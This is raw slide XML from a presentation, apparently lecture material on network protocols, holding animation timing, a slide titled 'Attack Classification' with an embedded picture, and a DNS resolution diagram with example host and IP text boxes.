                                          <p:spTgt spid="47119"/>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47122"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47122"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47122"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47122"/>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22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47120"/>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7121"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47121"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47123"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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47124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47124"/>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7125"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4712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7127"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47127"/>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7126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47126"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="90" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="91" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47130"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47130"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47130"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47130"/>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47131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47131"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47131"/>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47129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47129"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47129"/>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7128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47128"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4712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0" presetClass="entr" presetSubtype="0" decel="100000" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.3"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47136"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="118" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="119" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="120" presetID="50" presetClass="entr" presetSubtype="0" decel="100000" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.3"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="125" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="126" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47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08" grpId="0" animBg="1"/>
      <p:bldP spid="47109" grpId="0" animBg="1"/>
      <p:bldP spid="47110" grpId="0" animBg="1"/>
      <p:bldP spid="47111" grpId="0" animBg="1"/>
      <p:bldP spid="47112" grpId="0" animBg="1"/>
      <p:bldP spid="47113" grpId="0" animBg="1"/>
      <p:bldP spid="47114" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47115" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47116" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47117" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47118" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47119" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47120" grpId="0" animBg="1"/>
      <p:bldP spid="47121" grpId="0" animBg="1"/>
      <p:bldP spid="47122" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47123" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47124" grpId="0" animBg="1"/>
      <p:bldP spid="47125" grpId="0" animBg="1"/>
      <p:bldP spid="47126" grpId="0" animBg="1"/>
      <p:bldP spid="47127" grpId="0" animBg="1"/>
      <p:bldP spid="47128" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47129" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47130" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47131" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47132" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47135" grpId="0" animBg="1"/>
      <p:bldP spid="47136" grpId="0" bldLvl="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a:xfrm>
            <a:off x="1043608" y="116632"/>
            <a:ext cx="7793037" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Attack Classification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 61"/>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8"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59" name="Rectangle 72"/>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0" name="Rectangle 75"/>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1" name="Rectangle 101"/>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2" name="Rectangle 103"/>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3" name="Rectangle 104"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="72705" name="对象 72704"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2627784" y="1139680"/>
          <a:ext cx="4920481" cy="5889720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s625757" name="Picture" r:id="rId1" imgW="3482340" imgH="5539740" progId="Word.Picture.8">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Picture" r:id="rId1" imgW="3482340" imgH="5539740" progId="Word.Picture.8">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6257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139680"/>
                        <a:ext cx="4920481" cy="5889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72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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>域名服务协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="481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292417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388" y="1773238"/>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365625"/>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2420938"/>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extBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="3933825"/>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8136" name="TextBox 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="5445125"/>
            <a:ext cx="1628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本地</a:t>
            </a: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8137" name="TextBox 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3635375" y="2708275"/>
            <a:ext cx="1981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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.example.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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192.0.32.10</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48138" name="TextBox 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7418388" y="3983038"/>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其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48139" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-245436">
            <a:off x="1600200" y="3638550"/>
            <a:ext cx="2154238" cy="1560513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2538483"/>
              <a:gd name="T1" fmla="*/ 0 h 1228299"/>
              <a:gd name="T2" fmla="*/ 196281 w 2538483"/>
              <a:gd name="T3" fmla="*/ 8002752 h 1228299"/>
              <a:gd name="T4" fmla="*/ 579495 w 2538483"/>
              <a:gd name="T5" fmla="*/ 10591894 h 1228299"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2538483"/>
              <a:gd name="T10" fmla="*/ 0 h 1228299"/>
              <a:gd name="T11" fmla="*/ 2538483 w 2538483"/>
              <a:gd name="T12" fmla="*/ 1228299 h 1228299"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2538483" h="1228299">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="218364" y="361666"/>
                  <a:pt x="436729" y="723332"/>
                  <a:pt x="859809" y="928048"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1282889" y="1132764"/>
                  <a:pt x="2538483" y="1228299"/>
                  <a:pt x="2538483" y="1228299"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">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0" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4776788" y="3916363"/>
            <a:ext cx="2797175" cy="1092200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2797791"/>
              <a:gd name="T1" fmla="*/ 1095237 h 1091821"/>
              <a:gd name="T2" fmla="*/ 1770698 w 2797791"/>
              <a:gd name="T3" fmla="*/ 835117 h 1091821"/>
              <a:gd name="T4" fmla="*/ 2792255 w 2797791"/>
              <a:gd name="T5" fmla="*/ 0 h 1091821"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2797791"/>
